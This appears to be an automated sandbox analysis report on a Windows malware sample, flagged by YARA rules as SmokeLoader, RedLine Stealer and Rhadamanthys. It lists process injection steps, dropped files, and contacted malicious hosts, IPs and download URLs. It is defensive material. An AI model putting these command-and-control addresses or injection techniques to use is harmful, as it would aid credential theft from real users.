Source: C:\Users\user\AppData\Local\Temp\43D0.exe Memory written: C:\Users\user\AppData\Local\Temp\43D0.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000 value starts with: 4D5A Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 4601B14 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 11C1008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe Jump to behavior
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.387586822.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: explorer.exe, 00000003.00000000.375241968.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: fontview.exe, 0000000D.00000003.537869173.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
Source: fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetProgmanWindow
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_0042B0E9
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_0042B3D6
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_0042B38B
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_0042B471
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW, 6_2_00423431
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW, 6_2_0042B74F
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_0042B878
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW, 6_2_0042B97E
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_0042BA4D
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_00422F0B
Source: C:\Users\user\AppData\Roaming\beirutt Code function: GetLocaleInfoA, 7_2_0040BB6C
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413A75 cpuid 6_2_00413A75
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00413CC0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA, 6_2_004041D0

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 791287 Sample: file.exe Startdate: 25/01/2023 Architecture: WINDOWS Score: 100 55 Multi AV Scanner detection for domain / URL 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 10 other signatures 2->61 8 file.exe 2->8         started        11 beirutt 2->11         started        process3 signatures4 77 Detected unpacking (changes PE section rights) 8->77 79 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->79 81 Maps a DLL or memory area into another process 8->81 85 2 other signatures 8->85 13 explorer.exe 3 9 8->13 injected 83 Machine Learning detection for dropped file 11->83 process5 dnsIp6 49 potunulit.org 188.114.96.3, 49736, 80 CLOUDFLARENETUS European Union 13->49 39 C:\Users\user\AppData\Roaming\beirutt, PE32 13->39 dropped 41 C:\Users\user\AppData\Local\Temp\C676.exe, PE32 13->41 dropped 43 C:\Users\user\AppData\Local\Temp\C4AA.exe, PE32 13->43 dropped 45 2 other malicious files 13->45 dropped 91 System process connects to network (likely due to code injection or exploit) 13->91 93 Benign windows process drops PE files 13->93 95 Deletes itself after installation 13->95 97 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->97 18 C4AA.exe 7 13->18         started        23 43D0.exe 13->23         started        25 C676.exe 2 13->25         started        file7 signatures8 process9 dnsIp10 47 gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s 18->47 37 C:\Users\user\AppData\Local\...\4434343.dll, PE32 18->37 dropped 63 Multi AV Scanner detection for dropped file 18->63 65 Machine Learning detection for dropped file 18->65 67 Writes to foreign memory regions 18->67 69 Allocates memory in foreign processes 18->69 27 fontview.exe 18->27         started        30 ngentask.exe 2 18->30         started        33 ngentask.exe 18->33         started        71 Detected unpacking (changes PE section rights) 23->71 73 Detected unpacking (overwrites its own PE header) 23->73 75 Injects a PE file into a foreign processes 23->75 35 43D0.exe 12 23->35         started        file11 signatures12 process13 dnsIp14 87 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 27->87 89 Hides threads from debuggers 27->89 51 89.208.103.88, 37538, 49738 PSKSET-ASRU Russian Federation 30->51 53 api.2ip.ua 162.0.217.254, 443, 49737 ACPCA Canada 35->53 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.96.3
 potunulit.org European Union
13335 CLOUDFLARENETUS true
162.0.217.254
 api.2ip.ua Canada
35893 ACPCA false
89.208.103.88
 unknown Russian Federation
42569 PSKSET-ASRU true

Contacted Domains

Name IP Active
potunulit.org 188.114.96.3 true
api.2ip.ua 162.0.217.254 true
gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://potunulit.org/ true
  • URL Reputation: safe
  • URL Reputation: safe
 unknown
http://novanosa5org.org/ true
  • URL Reputation: safe
  • URL Reputation: safe
 unknown
http://golilopaster.org/ true
  • URL Reputation: safe
 unknown
http://bulimu55t.net/ true
  • URL Reputation: safe
 unknown
http://drampik.com/lancer/get.php true
  • Avira URL Cloud: malware
 unknown
89.208.103.88:37538 true
  • Avira URL Cloud: safe
 unknown